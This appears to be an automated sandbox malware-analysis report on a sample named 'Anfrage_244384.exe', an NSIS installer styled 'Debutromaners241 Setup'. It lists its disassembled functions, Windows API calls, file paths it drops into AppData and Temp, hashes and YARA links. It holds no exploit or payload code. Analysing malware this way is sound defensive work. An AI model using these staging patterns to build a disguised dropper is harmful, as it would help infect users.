String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 4315433588f7ee8e45bd5ba278d1dd566df0f8305feb02016673aa1b72d95d64
Instruction ID: 74b4d15ca57fbdec2c0db9e6478e75b59205225842bd8ef9acc4dc7b15762c80
Opcode Fuzzy Hash: 4315433588f7ee8e45bd5ba278d1dd566df0f8305feb02016673aa1b72d95d64
Instruction Fuzzy Hash: A30292B0A00209AFEF209F65DD45AAE7BB5FB84315F10853AF610B62E1C7789D52CF58

Function 10001A5D Relevance: 20.0, APIs: 13, Instructions: 540stringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 10001215: GlobalAlloc.KERNEL32(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D

GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 10001B67
lstrcpyA.KERNEL32(00000008,?), ref: 10001BAF
lstrcpyA.KERNEL32(00000408,?), ref: 10001BB9
GlobalFree.KERNEL32(00000000), ref: 10001BCC
GlobalFree.KERNEL32(?), ref: 10001CC4
GlobalFree.KERNEL32(?), ref: 10001CC9
GlobalFree.KERNEL32(?), ref: 10001CCE
GlobalFree.KERNEL32(00000000), ref: 10001E76
lstrcpyA.KERNEL32(?,?), ref: 10001FCA

Memory Dump Source

Source File: 00000000.00000002.2608477836.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2608425248.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2608498578.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2608545228.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_Anfrage_244384.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc
String ID:
API String ID: 4227406936-0
Opcode ID: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
Instruction ID: 780798ea066e4ece118e8e5fed0bf18c828ec290136deaf2e43fc5d0554b8685
Opcode Fuzzy Hash: 108015169a1f9511be137f3b76d088d284be53ebd3be1ec406ce9b744c5ee79e
Instruction Fuzzy Hash: 17129971D0424ADFFB20CFA4C8847EEBBF4FB043C4F61852AD5A1A2199DB749A81CB51

Function 00405DE5 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 199
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(?,0042A048,00000000,00405014,0042A048,00000000), ref: 00405E96
GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405F11
GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405F24
SHGetSpecialFolderLocation.SHELL32(?,0041C020), ref: 00405F60
SHGetPathFromIDListA.SHELL32(0041C020,Call), ref: 00405F6E
CoTaskMemFree.OLE32(0041C020), ref: 00405F79
lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F9B
lstrlenA.KERNEL32(Call,?,0042A048,00000000,00405014,0042A048,00000000), ref: 00405FED

Strings

Call, xrefs: 00405E0C, 00405EDE, 00405EFB, 00405F10, 00405F23, 00405F3F, 00405F6A, 00405F9A, 00405FA0, 00405FB8, 00405FCB, 00405FE6, 00405FEC, 00405FF7, 00406021
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405F95
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405EE0

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 900638850-1230650788
Opcode ID: fcec94f82e88fcce29c7e60c56cd8c103032a989a52b9d99fcd4bfd562cc5ef6
Instruction ID: dce6f903095129fb599a93a9a66318a4e9c512c80ea25934a290623bed19ebbf
Opcode Fuzzy Hash: fcec94f82e88fcce29c7e60c56cd8c103032a989a52b9d99fcd4bfd562cc5ef6
Instruction Fuzzy Hash: 2F611271A04A02AEEB209B24DD84BBF7BA8DB15314F50813FE942B62D1D37D49429F5E

Function 00405665 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileA.KERNELBASE(?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040568E
lstrcatA.KERNEL32(0042B870,\*.*,0042B870,?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004056D6
lstrcatA.KERNEL32(?,0040A014,?,0042B870,?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004056F7
lstrlenA.KERNEL32(?,?,0040A014,?,0042B870,?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004056FD
FindFirstFileA.KERNEL32(0042B870,?,?,?,0040A014,?,0042B870,?,?,76233410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040570E
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004057BB
FindClose.KERNEL32(00000000), ref: 004057CC

Strings

"C:\Users\user\Desktop\Anfrage_244384.exe", xrefs: 00405665
C:\Users\user\AppData\Local\Temp\, xrefs: 00405672
\*.*, xrefs: 004056D0

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\Anfrage_244384.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-4162446562
Opcode ID: 35f83909ae11c9f79d6b7d90eabebb09b3e9f21799a89a441620f803e9e91570
Instruction ID: 999a98db12b4221591f7ee6b6052c292a74d4854a5648a1040a4d82dc32c8f45
Opcode Fuzzy Hash: 35f83909ae11c9f79d6b7d90eabebb09b3e9f21799a89a441620f803e9e91570
Instruction Fuzzy Hash: 2B51D531800A48EADB216B61CC85BBF7A78DF42354F64817BF845721D2C73C4952EE6D

Function 004060C7 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE(76233410,0042C0B8,0042BC70,00405966,0042BC70,0042BC70,00000000,0042BC70,0042BC70,76233410,?,C:\Users\user\AppData\Local\Temp\,00405685,?,76233410,C:\Users\user\AppData\Local\Temp\), ref: 004060D2
FindClose.KERNELBASE(00000000), ref: 004060DE

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 7d865761c494c6b641247bef0bb2c924160845ff3ef93fdcf2db6d5e6c47237c
Instruction ID: 7bd6a1ee080489a50caeda4c967685e5e64830a7ebee4117dda32410da358e49
Opcode Fuzzy Hash: 7d865761c494c6b641247bef0bb2c924160845ff3ef93fdcf2db6d5e6c47237c
Instruction Fuzzy Hash: 5FD012316854309BC21097786D0C84B7A589F19331711CB37F4A6F11F0CB34CC66869D

Function 0040270B Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE(00000000,?,00000002), ref: 0040271A

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 9221aa77ab26fe255a706fdbb407d63210ae3e038afe0839ecce60615a5a5cc7
Instruction ID: c78e1de3aafbb837fdaa481cd05ce35d28cdafaef4a854467420e3d3da5db3c0
Opcode Fuzzy Hash: 9221aa77ab26fe255a706fdbb407d63210ae3e038afe0839ecce60615a5a5cc7
Instruction Fuzzy Hash: 18F0A7726041159BD710EBA49A49DEEB778DF15324F60417BF181B20C1D6B84A469B2A

Function 00403AD5 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B11
ShowWindow.USER32(?), ref: 00403B2E
DestroyWindow.USER32 ref: 00403B42
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403B5E
GetDlgItem.USER32(?,?), ref: 00403B7F
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403B93
IsWindowEnabled.USER32(00000000), ref: 00403B9A
GetDlgItem.USER32(?,00000001), ref: 00403C48
GetDlgItem.USER32(?,00000002), ref: 00403C52
SetClassLongA.USER32(?,000000F2,?), ref: 00403C6C
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403CBD
GetDlgItem.USER32(?,00000003), ref: 00403D63
ShowWindow.USER32(00000000,?), ref: 00403D84
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403D96
EnableWindow.USER32(?,?), ref: 00403DB1
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403DC7
EnableMenuItem.USER32(00000000), ref: 00403DCE
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403DE6
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403DF9
lstrlenA.KERNEL32(0042A868,?,0042A868,Debutromaners241 Setup), ref: 00403E22
SetWindowTextA.USER32(?,0042A868), ref: 00403E31
ShowWindow.USER32(?,0000000A), ref: 00403F65

Strings

Debutromaners241 Setup, xrefs: 00403E13

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: Debutromaners241 Setup
API String ID: 3282139019-3432080052
Opcode ID: da448d94bc17f5267805ab40a90d87622891c5bcd4f6a4fe796976a1d19e5176
Instruction ID: dc7e82238fa4606f4707b849198a3fa7e113026ae2232510f5cb024fb41842d5
Opcode Fuzzy Hash: da448d94bc17f5267805ab40a90d87622891c5bcd4f6a4fe796976a1d19e5176
Instruction Fuzzy Hash: 89C1AF71604605ABDB206F22EE45E2B3EBCEB4570AF40053EF642B11F1CB79A942DB1D

Function 00403743 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040615C: GetModuleHandleA.KERNEL32(?,?,?,0040320D,00000009), ref: 0040616E
Part of subcall function 0040615C: GetProcAddress.KERNEL32(00000000,?), ref: 00406189

lstrcatA.KERNEL32(1033,0042A868,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A868,00000000,00000002,76233410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Anfrage_244384.exe",00000000), ref: 004037BE
lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\secretaryships,1033,0042A868,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A868,00000000,00000002,76233410), ref: 00403833
lstrcmpiA.KERNEL32(?,.exe), ref: 00403846
GetFileAttributesA.KERNEL32(Call), ref: 00403851
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\secretaryships), ref: 0040389A

Part of subcall function 00405D21: wsprintfA.USER32 ref: 00405D2E

RegisterClassA.USER32(0042EBA0), ref: 004038D7
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004038EF
CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403924
ShowWindow.USER32(00000005,00000000), ref: 0040395A
GetClassInfoA.USER32(00000000,RichEdit20A,0042EBA0), ref: 00403986
GetClassInfoA.USER32(00000000,RichEdit,0042EBA0), ref: 00403993
RegisterClassA.USER32(0042EBA0), ref: 0040399C
DialogBoxParamA.USER32(?,00000000,00403AD5,00000000), ref: 004039BB

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403748
RichEd32, xrefs: 0040396E
1033, xrefs: 00403763, 004037B9
RichEdit20A, xrefs: 0040397E, 00403984
C:\Users\user\AppData\Roaming\secretaryships, xrefs: 004037CD, 004037D5, 0040386D, 00403873, 00403883
_Nb, xrefs: 004038B6, 0040391E
"C:\Users\user\Desktop\Anfrage_244384.exe", xrefs: 00403747
Call, xrefs: 00403801, 00403809, 00403816, 00403860, 00403866
RichEd20, xrefs: 00403960
RichEdit, xrefs: 0040398D
.exe, xrefs: 00403840
Control Panel\Desktop\ResourceLocale, xrefs: 00403777
.DEFAULT\Control Panel\International, xrefs: 004037A9

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\Anfrage_244384.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\secretaryships$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 1975747703-602595840
Opcode ID: a076f8ec2402cbae9f3fe9b816078eb7bdbed0063d8e43fd154ff60ee66dea9a
Instruction ID: b4fd17e6ad5735db6f0d6fe5a96b28392e8485eca6c7d92ade12033e63288973
Opcode Fuzzy Hash: a076f8ec2402cbae9f3fe9b816078eb7bdbed0063d8e43fd154ff60ee66dea9a
Instruction Fuzzy Hash: C261D8716446407ED720BF669D45F273EACDB54749F80447FF941B22E2CBBC99028A2D

Function 00402CFA Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402D0B
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Anfrage_244384.exe,00000400), ref: 00402D27

Part of subcall function 00405A36: GetFileAttributesA.KERNELBASE(00000003,00402D3A,C:\Users\user\Desktop\Anfrage_244384.exe,80000000,00000003), ref: 00405A3A
Part of subcall function 00405A36: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405A5C

GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Anfrage_244384.exe,C:\Users\user\Desktop\Anfrage_244384.exe,80000000,00000003), ref: 00402D73

Strings

"C:\Users\user\Desktop\Anfrage_244384.exe", xrefs: 00402CFA
C:\Users\user\Desktop\Anfrage_244384.exe, xrefs: 00402D11, 00402D20, 00402D34, 00402D54
soft, xrefs: 00402DE8
Null, xrefs: 00402DF1
C:\Users\user\AppData\Local\Temp\, xrefs: 00402D01
C:\Users\user\Desktop, xrefs: 00402D55, 00402D5A, 00402D60
Error launching installer, xrefs: 00402D4A
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402ED2
Inst, xrefs: 00402DDF

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\Anfrage_244384.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Anfrage_244384.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 4283519449-1920555191
Opcode ID: ff9acb172ce84b9ab5053db9bc38736bf02bbbb4910f3b2cd7bac771f2685801
Instruction ID: d5918a9216ca672954190790a9c5efd9bc82950644bb13a7859279fc2a8a748f
Opcode Fuzzy Hash: ff9acb172ce84b9ab5053db9bc38736bf02bbbb4910f3b2cd7bac771f2685801
Instruction Fuzzy Hash: 9F51EB71940215ABDB20AF64DE89B9F7BB8EB14355F50403BF900B72D1C7B88D858BAD

Function 00401759 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\secretaryships\Angoragedernes,00000000,00000000,00000031), ref: 00401798
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\secretaryships\Angoragedernes,00000000,00000000,00000031), ref: 004017C2

Part of subcall function 00405DC3: lstrcpynA.KERNEL32(?,?,00000400,00403251,Debutromaners241 Setup,NSIS Error), ref: 00405DD0

Part of subcall function 00404FDC: lstrlenA.KERNEL32(0042A048,00000000,0041C020,762323A0,?,?,?,?,?,?,?,?,?,0040308E,00000000,?), ref: 00405015
Part of subcall function 00404FDC: lstrlenA.KERNEL32(0040308E,0042A048,00000000,0041C020,762323A0,?,?,?,?,?,?,?,?,?,0040308E,00000000), ref: 00405025
Part of subcall function 00404FDC: lstrcatA.KERNEL32(0042A048,0040308E,0040308E,0042A048,00000000,0041C020,762323A0), ref: 00405038
Part of subcall function 00404FDC: SetWindowTextA.USER32(0042A048,0042A048), ref: 0040504A
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405070
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040508A
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405098

Strings

C:\Users\user\AppData\Local\Temp\nsgA6C3.tmp\System.dll, xrefs: 00401826, 00401842
C:\Users\user\AppData\Roaming\secretaryships\Angoragedernes, xrefs: 00401786
Call, xrefs: 00401775, 0040177E, 0040178B, 0040179D, 004017AE, 004017E4, 004017FA, 00401818, 00401858, 004018D9, 004018E2, 004018EC, 004018F7
C:\Users\user\AppData\Local\Temp\nsgA6C3.tmp, xrefs: 004017A3, 00401812, 00401830

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsgA6C3.tmp$C:\Users\user\AppData\Local\Temp\nsgA6C3.tmp\System.dll$C:\Users\user\AppData\Roaming\secretaryships\Angoragedernes$Call
API String ID: 1941528284-2978436225
Opcode ID: dbd51bdbfd1ce860f4c1c765c855f49dbf4a1797cd8297ab6e253aaa72fcfa08
Instruction ID: 615a3562c55b05fa993605831867e42c155a1137a6b97b034e6d1829953e469f
Opcode Fuzzy Hash: dbd51bdbfd1ce860f4c1c765c855f49dbf4a1797cd8297ab6e253aaa72fcfa08
Instruction Fuzzy Hash: E541D572910515BBCF107BB5DC49EAF3679EF05368F20823BF121B20E1D67C8A518A6D

Function 00402F33 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402F9A
GetTickCount.KERNEL32 ref: 00403041
MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 0040306A
wsprintfA.USER32 ref: 0040307A

Strings

TA, xrefs: 004030F4
... %d%%, xrefs: 00403074
;mA, xrefs: 00403007, 00403019
TA, xrefs: 00402FF0

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: TA$ TA$... %d%%$;mA
API String ID: 551687249-2794615820
Opcode ID: 205d5d13d599fec26c2c222d56ddb78c5c9a5f9a8d28ce79d18f424d9808a9fb
Instruction ID: 17fda0b725f1c36f5789cb51541ed76e7f3e8dd53de897cd261334f9a9fb1752
Opcode Fuzzy Hash: 205d5d13d599fec26c2c222d56ddb78c5c9a5f9a8d28ce79d18f424d9808a9fb
Instruction Fuzzy Hash: 4F519D71901219DBCB10DF65DA44B9E7BB8EF08366F10813BE810B72D0D7789A41CBAD

Function 004054A2 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004054E5
GetLastError.KERNEL32 ref: 004054F9
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040550E
GetLastError.KERNEL32 ref: 00405518

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004054C8
C:\Users\user\Desktop, xrefs: 004054A2

Memory Dump Source

Source File: 00000000.00000002.2596449027.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2596432455.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596476754.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596503939.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2596600398.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Anfrage_244384.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
API String ID: 3449924974-1229045261
Opcode ID: 45a109fca96412ce29b98a5dc57c77bd9b21184e8ca6d4253022bd40daed81d6
Instruction ID: 8f3a1ad4c11c26192a8320527681c6b281dda8cd8d23604747c1fe251039353f
Opcode Fuzzy Hash: 45a109fca96412ce29b98a5dc57c77bd9b21184e8ca6d4253022bd40daed81d6
Instruction Fuzzy Hash: 2101E571D10619EADF119FA4CA047EFBFB8EB14355F00403AD945B6180D77896488FA9

